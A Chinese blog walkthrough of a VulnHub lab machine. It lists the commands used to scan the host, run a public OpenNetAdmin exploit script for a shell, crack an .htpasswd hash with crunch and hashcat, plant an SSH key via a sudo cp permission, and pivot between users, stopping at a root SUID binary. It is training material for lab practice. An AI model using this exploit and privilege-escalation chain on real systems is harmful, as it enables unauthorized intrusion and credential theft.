📒博客主页:开心星人的博客主页
🔥系列专栏:vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年7月15日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
跟着这篇打靶的
靶机为桥接模式,配置kali为桥接模式
主机发现arp-scan -l
端口扫描nmap -p- -sV 192.168.1.103
开放了22、80、1000端口
访问80端口,一片空白
进行目录扫描dirb http://192.168.1.103
访问reports,需要登录
访问robots.txt
访问ona
知道了这是 opennetadmin
searchsploit opennetadmin
searchsploit -x php/webapps/47691.sh
//查看脚本内容
locate php/webapps/47691.sh
//查看脚本路径
我们指定一个url即可
bash /usr/share/exploitdb/exploits/php/webapps/47691.sh http://192.168.1.103/ona/
直接拿到shell
ls /home
有这几个用户
douglas、jen、moss、richmond、roy
尝试用sudo、suid提权,不行
find / -type f -user www-data
查看当前用户可以读取的文件
/proc目录、/var/www/html/reports/.htaccess和/var/log/ona.log
cat /var/www/html/reports/.htaccess
告诉我们/var/www/.htpasswd
文件
cat /var/www/.htpasswd
告诉我们用户名和密码
提示我们怎么去爆破hash
密码长度为10,由aefhrt组成
使用crunch生成字典
crunch 10 10 aefhrt -o password.txt
hash-identifier判断hash类型
MD5(APR)
使用hashcat进行爆破
hashcat -h | grep APR
查找MD5(APR)的编号
将$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
写入hash.txt
hashcat -m 1600 -a 0 -o jieguo.txt hash.txt password.txt --force
hashcat -m 1600 -a 0 hash.txt password.txt --force --show
-m 指定hash模式
-a 指定破解模式,0为用字典爆破
-o 结果输出到文件
--force 忽略警告信息
结果:fatherrrrr
douglas:fatherrrrr
可以登录上reports
登录ssh
ssh douglas@192.168.1.103
登录成功,没有发现什么铭感文件
尝试提权
sudo -l
(jen) NOPASSWD: /bin/cp //有jen用户的cp权限
把douglas的ssh公钥拷到jen中,实现ssh免密登录
cp .ssh/id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
成功
t提示我们有一封邮件
cd /var/mail/
告诉我们moss的密码为Fire!Fire!
直接使用su切换,不要再用ssh了
去家目录发现.game
total 28
drwx------ 2 moss moss 4096 Jan 1 2020 .
drwx------ 3 moss moss 4096 Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss 14 Jan 1 2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss 15 Jan 1 2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss 25 Jan 1 2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
upyourgame是root权限执行的
结束